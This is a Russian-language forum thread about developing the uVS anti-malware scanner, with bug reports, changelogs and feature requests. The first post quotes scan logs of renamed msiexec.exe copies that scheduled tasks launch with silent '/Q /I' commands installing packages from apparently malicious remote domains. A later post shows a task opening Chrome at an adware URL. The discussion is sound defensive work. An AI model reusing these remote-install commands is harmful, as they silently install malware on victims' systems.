Перейти к содержанию

Recommended Posts

PR55.RP55

Demkd

http://www.tehnari.ru/f35/t260199/index2.html

----------------------

Полное имя                  C:\PROGRAM FILES (X86)\XBZNZDRBWUF.EXE
Имя файла                   XBZNZDRBWUF.EXE
Тек. статус                 ?ВИРУС? ПРОВЕРЕННЫЙ ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                            
www.virustotal.com          2018-06-29
-                           Файл был чист на момент проверки.
                            
Удовлетворяет критериям     
КЛЮЧ: I ДЛЯ HTTP            ( ~ /I HTTP)(1) [skip (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      ПРОВЕРЕННЫЙ в автозапуске
File_Id                     5A74A3E814000
Linker                      9.0
Размер                      73216 байт
Создан                      03.01.1601 в 20:33:16
Изменен                     03.01.1601 в 20:33:16
                            
TimeStamp                   02.02.2018 в 17:46:16
EntryPoint                  +
OS Version                  6.0
Subsystem                   Windows graphical user interface (GUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   32-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Microsoft Windows
                            
Оригинальное имя            msiexec.exe
Версия файла                5.0.7601.24052 (win7sp1_ldr.180202-0600)
Описание                    Windows® installer
Copyright                   © Microsoft Corporation. All rights reserved.
Производитель               Microsoft Corporation
                            
Доп. информация             на момент обновления списка
CmdLine                     /Q /I HTTP://FRESHREFRESHNERER186RB.INFO/21KG9WW18H1.QRA
SHA1                        75EF26FDCA12A29C37FE070065F7EE6712ECA247
MD5                         06983C58F6D1CAE00A72CE5091715C79
                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\{A114291D-15AB-38A4-96A0-051FE3160E88}
Prefetcher                  C:\WINDOWS\Prefetch\Layout.ini

----------------------------------------

Полное имя                  C:\USERS\OSMAT\LWYE.EXE
Имя файла                   LWYE.EXE
Тек. статус                 ?ВИРУС? ПРОВЕРЕННЫЙ ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                            
www.virustotal.com          2018-06-29
-                           Файл был чист на момент проверки.
                            
Удовлетворяет критериям     
КЛЮЧ: I ДЛЯ HTTP            ( ~ /I HTTP)(1) [skip (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      ПРОВЕРЕННЫЙ в автозапуске
File_Id                     5A74A3E814000
Linker                      9.0
Размер                      73216 байт
Создан                      14.07.2009 в 04:14:20
Изменен                     14.07.2009 в 04:14:20
                            
TimeStamp                   02.02.2018 в 17:46:16
EntryPoint                  +
OS Version                  6.0
Subsystem                   Windows graphical user interface (GUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   32-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Microsoft Windows
                            
Оригинальное имя            msiexec.exe
Версия файла                5.0.7601.24052 (win7sp1_ldr.180202-0600)
Описание                    Windows® installer
Copyright                   © Microsoft Corporation. All rights reserved.
Производитель               Microsoft Corporation
                            
Доп. информация             на момент обновления списка
CmdLine                     /Q /I HTTP://LIVE-4GUP.COM/Z21VB61XKZ3Q.YIH
SHA1                        75EF26FDCA12A29C37FE070065F7EE6712ECA247
MD5                         06983C58F6D1CAE00A72CE5091715C79
                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\{FFF9CB7D-AC62-3D17-AADB-19D60A353A08}
--------------------------------------------------

   

Полное имя                  C:\USERS\OSMAT\APPDATA\ROAMING\EMMYZOUIEAA.EXE
Имя файла                   EMMYZOUIEAA.EXE
Тек. статус                 ?ВИРУС? ПРОВЕРЕННЫЙ ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                            
www.virustotal.com          2018-06-29
-                           Файл был чист на момент проверки.
                            
Удовлетворяет критериям     
КЛЮЧ: I ДЛЯ HTTP            ( ~ /I HTTP)(1) [skip (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      ПРОВЕРЕННЫЙ в автозапуске
File_Id                     5A74A3E814000
Linker                      9.0
Размер                      73216 байт
Создан                      03.01.1601 в 20:33:16
Изменен                     03.01.1601 в 20:33:16
                            
TimeStamp                   02.02.2018 в 17:46:16
EntryPoint                  +
OS Version                  6.0
Subsystem                   Windows graphical user interface (GUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   32-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Microsoft Windows
                            
Оригинальное имя            msiexec.exe
Версия файла                5.0.7601.24052 (win7sp1_ldr.180202-0600)
Описание                    Windows® installer
Copyright                   © Microsoft Corporation. All rights reserved.
Производитель               Microsoft Corporation
                            
Доп. информация             на момент обновления списка
CmdLine                     /Q /I HTTP://FRESHREFRESHNERER186.INFO/3H6EYI3KRY.86B
SHA1                        75EF26FDCA12A29C37FE070065F7EE6712ECA247
MD5                         06983C58F6D1CAE00A72CE5091715C79
                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\{0F456675-4487-6417-F110-6D52041D2B12}
Prefetcher                  C:\WINDOWS\Prefetch\Layout.ini

---------------------------------------------------------

Полное имя                  C:\WINDOWS\SYSWOW64\QAYRUOPSOK.EXE
Имя файла                   QAYRUOPSOK.EXE
Тек. статус                 ?ВИРУС? ПРОВЕРЕННЫЙ ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                            
www.virustotal.com          2018-06-29
-                           Файл был чист на момент проверки.
                            
Удовлетворяет критериям     
КЛЮЧ: I ДЛЯ HTTP            ( ~ /I HTTP)(1) [skip (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      ПРОВЕРЕННЫЙ в автозапуске
File_Id                     5A74A3E814000
Linker                      9.0
Размер                      73216 байт
Создан                      14.07.2009 в 04:14:20
Изменен                     14.07.2009 в 04:14:20
                            
TimeStamp                   02.02.2018 в 17:46:16
EntryPoint                  +
OS Version                  6.0
Subsystem                   Windows graphical user interface (GUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   32-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Microsoft Windows
                            
Оригинальное имя            msiexec.exe
Версия файла                5.0.7601.24052 (win7sp1_ldr.180202-0600)
Описание                    Windows® installer
Copyright                   © Microsoft Corporation. All rights reserved.
Производитель               Microsoft Corporation
                            
Доп. информация             на момент обновления списка
CmdLine                     /Q /I HTTP://LIVE-4GUP.COM/GTGRRHJVFVIX.MTP
SHA1                        75EF26FDCA12A29C37FE070065F7EE6712ECA247
MD5                         06983C58F6D1CAE00A72CE5091715C79
                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\{D6B75649-5992-BB36-B131-13ABE0D76560}

----------------------------------------------------

1) Это как ?

Вроде недавно были выявлены новые проблемы с проверкой ЭЦП в Windows.

2) Я уже раз: 8 говорил\предлагал реализовать автоматическое сопоставление SHA1

на выявление множественных однотипных  SHA1 в системе с присвоением им соответствующего статуса.

 

+ вносить в Инфо. файла запись с перечислением всех файлов с однотипным  SHA1

 

                            

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
alamor
3 часа назад, PR55.RP55 сказал:

) Это как ?

Вроде недавно были выявлены новые проблемы с проверкой ЭЦП в Windows.

нету тут проблем с проверкой ЭЦП. Это скопированный и переименованный системный файл msiexec.exe. Так что всё правильно. В информации всё нужное есть.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Vvvyg

Есть такая задача:

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{83F346CB-42DE-469A-8501-40A8AE73A034}\Actions
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" http://mods-new.com/cl/?guid=4uvkhj4eripsplgfborouyfqnpxg8f12&prid=1&pid=4_1344_0

А удалить её по delref по образу нельзя, только вместе с хромом. Непорядок.

WIN-DC067KCHEHA_2018-07-05_16-00-00.7z

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
В 25.03.2018 at 5:54 PM, demkd сказал:

посмотрю

Между прочем: Март месяц !

Итак тема:  http://www.tehnari.ru/f35/t260156/

Веб Push-уведомления

https://support.mozilla.org/ru/kb/veb-push-uvedomleniya-v-firefox?as=u&utm_source=inproduct

Конкретно по теме.

Сайт: 

agefeed.com

перенаправляет на: 

https://55938.pushstat.com/i_3.php?c=100&st_1=1

Где происходит запрос ( см.фото)

88888888888888.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
10 минут назад, PR55.RP55 сказал:

Веб Push-уведомления

это надо ковырять базы лисы, а с этим есть проблема

 

В 06.07.2018 at 12:32 AM, Vvvyg сказал:

А удалить её по delref по образу нельзя, только вместе с хромом. Непорядок.

это да, такова особенность uVS он работает с файлами,  а не отдельным записями где-то там, в данном случае надо использовать что-то более стандартное.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Demkd пишет:     это надо ковырять базы лисы, а с этим есть проблема  

А, что мешает написать разработчикам...

Представиться;  указать на проблему и совместно её решить.

----------

Проблема ( как видно из темы ) Касается и IE и Хром-а.

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
8 часов назад, PR55.RP55 сказал:

А, что мешает написать разработчикам...

А причем тут разрабы, формат известен, проблема во времени необходимом на интеграцию sql в uVS и само совместимостью такого комбайна с PE, со временем вопрос решится буду смотреть.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

При попытке выполнить  в uVS:  "Открыть в браузере отчёт"

404 - Запрашиваемая страница не найдена.

https://www.virustotal.com/latest-report.html?resource=bdaa128de70313feb65469a1b1518fd048734f54

При том, что SHA файла есть:

https://www.virustotal.com/ru/file/fce6b3c60fd50d2d12f6379da5734380dc888931860e68f6e3ae2bb0c54582ac/analysis/

И так для всех файлов.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd

---------------------------------------------------------
 4.0.13
---------------------------------------------------------
 o Обновлена функция открытия отчета по хэшу файла на VT.

 o Улучшена функция анализа командной строки.

 o Добавлена поддерджка расширений новых версий Firefox x86/x64.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

 У меня уже несколько дней при обращении к V.T. выдаёт ошибку:

Error:  [Ошибка номер 12045]

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
11 минут назад, PR55.RP55 сказал:

Error:  [Ошибка номер 12045]

12045 - проблема с сертификатом, а это значит или подключение через совсем уж кривую проксю или обращение идет совсем не к VT и стоит проверить dns и систему в целом, ну или время на компе мягко говоря далекое от реального ;)
У меня работает нормально и проблем с сертификатом у VT не предвидится до 3 февраля 2020 года.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

При обращении к virusscan.jotti.org

Error:  [Ошибка номер 12157]

---------

Системное время в порядке.

DNS -  без изменений.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
10 минут назад, PR55.RP55 сказал:

Error:  [Ошибка номер 12157] 

Это из той же оперы, проблемы с https соединением, лечить систему надо, что-то в ней не так. Рекомендую открыть в IE страничку VT и добиться того что бы она таки открывалась, а не выдавала ошибку, она как раз всегда редиректится на https.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd

Вчера попался случай со старым zec майнером, но с интересным обвесом в виде нескольких отдельных модулей защиты, пришлось кое-что улучшить.
---------------------------------------------------------
 4.0.14
---------------------------------------------------------
 o Добавлена экспериментальная функция обнаружения внедренных потоков в известные системные процессы (пока только для 32-х битных процессов).
   В случае обнаржуения в лог выводится строка:
   Injected thread detected in process полный_путь [PID], tid=TID
   Функция дополняет старый функционал по обнаружению потоков на базе внедренных DLL.
   (!) В WinXP x64 функция может работать неправильно.

 o URL в параметрах запусках теперь автоматически получает статус подозрительного объекта.

 o Новый параметр bFakeName
   [Settings]
   ; Использовать случайное имя главного окна для обхода блокировки запуска по содержимому заголовка.
     bFakeName (по умолчанию 0)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
40 минут назад, demkd сказал:

---------------------------------------------------------
 4.0.14
---------------------------------------------------------

 

demkd,

пока что с ошибкой идет обновление. в 4.0.13 все было ок.

Цитата

07.08.2018 20:59:35 Получение списка файлов... [Ok]
07.08.2018 20:59:35 Построение списка файлов для обновления... [Ok]
07.08.2018 20:59:35 Новых хэшей в базе SHA\VT1: 0
07.08.2018 20:59:35 Доступно обновление файлов:
07.08.2018 20:59:35 E:\soft\avirus\Universal Virus Sniffer latest\DOC\WhatsNew.txt [Ошибка]
07.08.2018 20:59:35 Сервис временно недоступен.
07.08.2018 20:59:35 Обновление завершено.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
4 часа назад, santy сказал:

пока что с ошибкой идет обновление. в 4.0.13 все было ок.

ага, wahtsnew забыл обновить, теперь все должно быть нормально.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Vvvyg

Тем не менее, на 23 ч. МСК с обновлением всё также...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
8 часов назад, Vvvyg сказал:

Тем не менее, на 23 ч. МСК с обновлением всё также...

В течении часа заработает, проблема была не только в whatsnew.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Demkd

Я вот, что подумал.

uVS проверяет ЭЦП\сертификат - каталог подписей.

А, что, если  использовать данные из:  System32\catroot

для выявления объектов = составления списка.

Пример:

epfwwfpr.cat  С:\Program Files\ESET\ESET NOD32 Antivirus\Drivers\epfwwfpr

ehdrv.cat           С:\Program Files\ESET\ESET NOD32 Antivirus\Drivers\ehdrv

В том числе работать с:  .inf  файлами - сведениями для установки в качестве доп. источника информации.

Есть:  .inf файл к драйверу, или нет, какую информацию содержит, даты создания, изменения и т.д.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

1) Из под Live CD не корректно работает с ярлыками на _ рабочем столе.
при применении  _твиков  просто удаляет ярлыки.
( возможно на некоторых Live CD )

2) Полное имя                  C:\DOCUMENTS AND SETTINGS\!USER!\
Имя файла                   
Статус                      [Запускался неявно или вручную]
Инф. о файле                Не удается найти указанный файл.
Цифр. подпись               проверка не производилась
                            
Данная запись относиться к файлу с: 0 байт стандартным: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
в карантин файл помещается, как: ._DA39A3EE5E6B4B0D3255BFEF95601890AFD80709

И так...
Операция удаления ссылок добавлена в очередь: C:\DOCUMENTS AND SETTINGS\!USER!\
Как-то настораживает ?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

https://www.virustotal.com

Чудовищно медленно открывается ( с этой модемой от  Yota )

А

https://www.virustotal.com/ru/

работает хорошо.

Можно в settings.ini  добавить настройки к какому ресурсу обращаться ?

это же относиться и к public API VirusTotal

Они сейчас всё через фильтр прогоняют по требованию Роскомнадзор-а.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

Так скачать - часть три.  :)

CHR DefaultSearchKeyword: Default

А uVS  это видит ?

CHR DefaultSearchKeyword: Default -> yoursearching

CHR DefaultSearchKeyword: Default -> feed.sonic-search.com

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
7 часов назад, PR55.RP55 сказал:

( возможно на некоторых Live CD )

А кто заставляет использовать кривые или устаревшие образы?
 

7 часов назад, PR55.RP55 сказал:

2) Полное имя                  C:\DOCUMENTS AND SETTINGS\!USER!\

Надо изначальный путь из которого получается это, тогда можно будет посмотреть.
 

7 часов назад, PR55.RP55 сказал:

Чудовищно медленно открывается ( с этой модемой от  Yota )

Потому что там новый интерфейс, а русскую версию еще не обновили, обновят будет так же медленно.
 

3 часа назад, PR55.RP55 сказал:

А uVS  это видит ?

CHR DefaultSearchKeyword: Default -> yoursearching 

Понятия не имею что использует этот ключ, ничего из изветного мне его не использует, поэтому не вижу смысла его добавлять.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
14 часов назад, demkd сказал:

Надо изначальный путь из которого получается это, тогда можно будет посмотреть.

1) Данная ошибка наблюдается на версии: 4.0.13 и 4.0.14  на предыдущих нет.

на ХР SP3

1.2) Из под Live CD Win 10.0.1 - > = 4.0.14 с выбором неактивной системы ошибки нет.

2)  Справка:

https://getadmx.com/?Category=Chrome&Policy=Google.Policies.Chrome::DefaultSearchProviderKeyword

Default search provider keyword

+

DefaultSearchProviderName

и т.д.

Цитата

    

Омнибокс - такое название получило универсальное поле для ввода строк в браузере на основе Хромиума. Если в омнибокс написать адрес сайта, то он просто перейдет по соответствующему адресу, если написать поисковый запрос, то будет осуществлен поиск в соответствии с выбранной поисковой системой. Кроме того, специальным образом формируя строку запроса через омнибокс можно указать, например, что не смотря на выбранную систему поиска, поиск осуществлялся бы через другую систему.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
alamor

1) По поводу поисковиков Хрома уже писал, что нужно добавить в обработку файл со списком поисковиков Хрома. Там обычная база SQL, не запароленная.

2) Предлагаю зарегистрировать отдельный акк для uVS на VirustoTotal. Полученный там API key оформить его как публичный (снимаются ограничения по IP и это делается бесплатно) и чтобы он был бы в настройках программы по умолчанию. Тогда сразу после скачивания программы с настройками по умолчанию можно будет проверять файлы через VT API.

3)

22 часов назад, demkd сказал:

Потому что там новый интерфейс, а русскую версию еще не обновили, обновят будет так же медленно.

Так хоть пока они не перевели на этот htm5, хотелось бы пользоваться "быстрыми" страницами со старой системой. Надеюсь они не скоро их переведут.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Создайте учетную запись или войдите, чтобы комментировать

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Сообщения

    • Ego Dekker
    • ArktiTig
      Арктика - северная полярная область Земли, включающая окраины материков Евразии и Северной Америки, почти весь Северный Ледовитый океан с островами и прилегающие к нему части Атлантического и Тихого океанов. Название её происходит от греческого слова arctos (медведь) и связано со звёздами: Полярная звезда, находящаяся почти точно в зените над Северным полюсом, принадлежит к созвездию Малая Медведица.
    • ArktiTig
      Арктика - северная полярная область Земли, включающая окраины материков Евразии и Северной Америки, почти весь Северный Ледовитый океан с островами и прилегающие к нему части Атлантического и Тихого океанов. Название её происходит от греческого слова arctos (медведь) и связано со звёздами: Полярная звезда, находящаяся почти точно в зените над Северным полюсом, принадлежит к созвездию Малая Медведица.
    • PR55.RP55
      .xml  файлы taskschd.msc Могут быть подписаны  цифровой подписью. Думаю будет нелишним, если uVS будет это фиксировать. т.е. проверять не только подпись целевого файла, но и подпись самого файла\задачи. и писать в ИНфО .  
    • demkd
      ---------------------------------------------------------
       4.15.2
      ---------------------------------------------------------
       o Исправлена ошибка при работе с образом автозапуска.
         Для некоторых процессов команда unload не добавлялась в скрипт при нажатии кнопки "принять изменения".  o Добавлена плашка окна на таскбаре для окна удаленного рабочего стола.
         (при работе с удаленной системой) -----------------------------------------------------------
      Есть проблема с локализацией глюка в редких случаях приводящему к аварийному завершению uVS при активном флаге "Проверять весь HKCR".
      На основе дампов его найти не получается, нужна копия реестра системы с такой проблемой, если кому-то попадется такая проблема, то присылайте архив с копией реестра системы мне на почту.  
×